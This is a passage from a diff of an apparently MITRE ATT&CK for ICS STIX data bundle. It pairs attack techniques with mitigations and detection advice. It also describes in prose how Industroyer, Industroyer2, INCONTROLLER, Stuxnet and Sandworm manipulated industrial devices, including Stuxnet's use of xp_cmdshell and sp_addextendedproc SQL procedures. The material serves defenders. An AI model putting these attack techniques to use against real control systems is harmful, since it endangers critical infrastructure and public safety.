Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--665587ee-1524-4334-9580-2b448c417542", + "created": "2023-03-30T19:26:07.209Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Mandiant April 2022", + "description": "Daniel Kapellmann Zafra, Raymond Leong, Chris Sistrunk, Ken Proska, Corey Hildebrandt, Keith Lunden, Nathan Brubaker. (2022, April 25). INDUSTROYER.V2: Old Malware Learns New Tricks. Retrieved March 30, 2023.", + "url": "https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks" + }, + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. 
Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-06T22:09:44.559Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) modifies specified Information Object Addresses (IOAs) for specified Application Service Data Unit (ASDU) addresses to either the ON or OFF state.(Citation: Industroyer2 Mandiant April 2022)(Citation: Industroyer2 Forescout July 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--366a4cd1-aa95-4985-9d80-b45a2551e298", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.179Z", + "relationship_type": "mitigates", + "description": "Filter for protocols and payloads associated with program download activity to prevent unauthorized device configurations.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c4122b58-f1b2-4656-a715-55016700bf75", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + 
"source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:56:39.825Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) automatically collects protocol object data to learn about control devices in the environment. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--07f4d65d-4572-450f-8cb2-908fee97bd67", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "Application control may be able to prevent the running of executables masquerading as other files.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--243ad7b2-546c-4bf2-a3c0-1438b13e197d", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.169Z", + "relationship_type": "mitigates", + "description": "Systems and devices should restrict access to any data with potential confidentiality concerns, including point and tag information.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ee1a52bc-6c1b-4e2c-b296-173dccbc020a", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:44:27.451Z", + "description": "Use deep packet inspection to look for artifacts of common exploit traffic, such as known payloads.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e8eaac2d-a4bf-408f-b24f-14471db7059b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.088Z", + "relationship_type": "mitigates", + "description": "Minimize permissions and access for service accounts to limit the information that may be impacted by malicious users or software. 
(Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7411b05d-209a-4907-83ce-00ab1538fbac", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.084Z", + "relationship_type": "mitigates", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific C2 protocol used by a particular adversary or tool and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. 
(Citation: Gardiner, J., Cova, M., Nagaraja, S February 2014)\n", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "external_references": [ + { + "source_name": "Gardiner, J., Cova, M., Nagaraja, S February 2014", + "description": "Gardiner, J., Cova, M., Nagaraja, S 2014, February Command & Control Understanding, Denying and Detecting Retrieved. 2016/04/20 ", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--eb1e05ef-58df-4c6d-acd7-5cc63ff7f44f", + "created": "2021-10-08T15:42:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Inc. June 2017", + "description": "Dragos Inc. 2017, June 13 Industroyer - Dragos - 201706: Analysis of the Threat to Electic Grid Operations Retrieved. 2017/09/18 ", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:01:24.078Z", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) establishes an internal proxy prior to the installation of backdoors within the network. (Citation: Dragos Inc. 
June 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--65a45501-10de-46a2-89bf-03bbf17aba33", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.166Z", + "relationship_type": "mitigates", + "description": "Perform integrity checks of firmware before uploading it on a device. Utilize cryptographic hashes to verify the firmware has not been tampered with by comparing it to a trusted hash of the firmware. This could be from trusted data sources (e.g., vendor site) or through a third-party verification service.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--08a4f730-bc3f-4050-973f-1ef2847db4e7", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:57:47.375Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous 
traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1c831708-28c2-47ae-a158-39f1f7b73406", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 
2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T20:10:57.573Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) IEC 61850 payload component has the ability to discover relevant devices in the infected host's network subnet by attempting to connect on port 102.(Citation: Anton Cherepanov, ESET June 2017)\n\n[Industroyer](https://attack.mitre.org/software/S0604) contains an OPC DA module that enumerates all OPC servers using the `ICatInformation::EnumClassesOfCategories` method with `CATID_OPCDAServer20` category identifier and `IOPCServer::GetStatus` to identify the ones running.", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f0c8a954-c1a0-453a-9c1d-484305abdab2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T18:59:17.429Z", + "modified": "2022-05-06T17:47:24.189Z", + "relationship_type": "mitigates", + "description": "Filter application-layer protocol messages for remote services to block any unauthorized activity.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": 
"relationship--b778b3c3-5dd3-4c0b-b7d9-78e6bb40a544", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T20:51:43.487Z", + "description": "Monitor for unusual network traffic that may indicate additional tools transferred to the system. Use network intrusion detection systems, sometimes with SSL/TLS inspection, to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b346eec8-de90-407c-b665-387086bb4553", + "created": "2022-09-29T01:36:02.223Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. 
Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.444Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can use the CODESYS protocol to upload programs from Schneider PLCs.(Citation: Wylie-22)(Citation: Brubaker-Incontroller) \n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can obtain existing program logic from Omron PLCs by using either the program upload or backup functions available through the HTTP server.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a2142552-6b8d-4751-a3d4-1471420c02fc", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:15:48.476Z", + "description": "Monitor for newly constructed network connections into a service specifically designed to accept remote connections, such as RDP, Telnet, SSH, and VNC. Monitor network connections involving common remote management protocols, such as ports tcp:3283 and tcp:5900, as well as ports tcp:3389 and tcp:22 for remote logins. 
The adversary may use [Valid Accounts](https://attack.mitre.org/techniques/T0859) to enable remote logins.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--491455dc-f7c8-4e12-811b-b8c5c041b4c3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.102Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--a04169ed-c16b-466b-80ef-22a11067f475", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 
2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:54:58.401Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) is able to block serial COM channels temporarily causing a denial of view. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dc15440d-6683-435a-8c87-64daea29bcaa", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:01:03.550Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) blocked command messages by using malicious firmware to render communication devices inoperable. 
(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8ecf5eac-7767-411b-b54a-b374ea51b9e9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.139Z", + "relationship_type": "mitigates", + "description": "Hot-standbys in diverse locations can ensure continued operations if the primarily system are compromised or unavailable. At the network layer, protocols such as the Parallel Redundancy Protocol can be used to simultaneously use redundant and diverse communication over a local network. (Citation: M. Rentschler and H. Heine)\n", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "external_references": [ + { + "source_name": "M. Rentschler and H. Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 
2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--eaeb3c8d-9d91-4eb0-8049-5cb99e141026", + "created": "2021-10-08T15:25:32.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:20:42.055Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) executes malicious SQL commands in the WinCC database server to propagate to remote systems. The malicious SQL commands include xp_cmdshell, sp_dumpdbilog, and sp_addextendedproc. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--052552e9-eac0-4b37-9df8-2e921053e305", + "created": "2023-03-30T19:05:17.003Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:05:17.003Z", + "description": "Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (e.g., .pdf, .docx, .jpg, .dwg ) or local databases.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6be4cef2-3d54-4cd8-97df-8a8b37c03605", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.089Z", + "relationship_type": "mitigates", + "description": "Utilize central storage servers for critical operations where possible (e.g., historians) and keep remote backups. For outstations, use local redundant storage for event recorders. 
Have backup control system platforms, preferably as hot-standbys to respond immediately to data destruction events. (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--327916f7-fe5d-4858-adeb-f72f74c60c25", + "created": "2021-10-08T15:25:32.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:11:45.996Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) sends an SQL statement that creates a table and inserts a binary value into the table. The binary value is a hex string representation of the main Stuxnet DLL as an executable file (formed using resource 210) and an updated configuration data block. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ea817c7a-9424-4204-90a5-6f8fb86037be", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.230Z", + "relationship_type": "mitigates", + "description": "Configure features related to account use like login attempt lockouts, specific login times, and password strength requirements as examples. Consider these features as they relate to assets which may impact safety and availability. (Citation: Keith Stouffer May 2015)\n", + "source_ref": "course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 
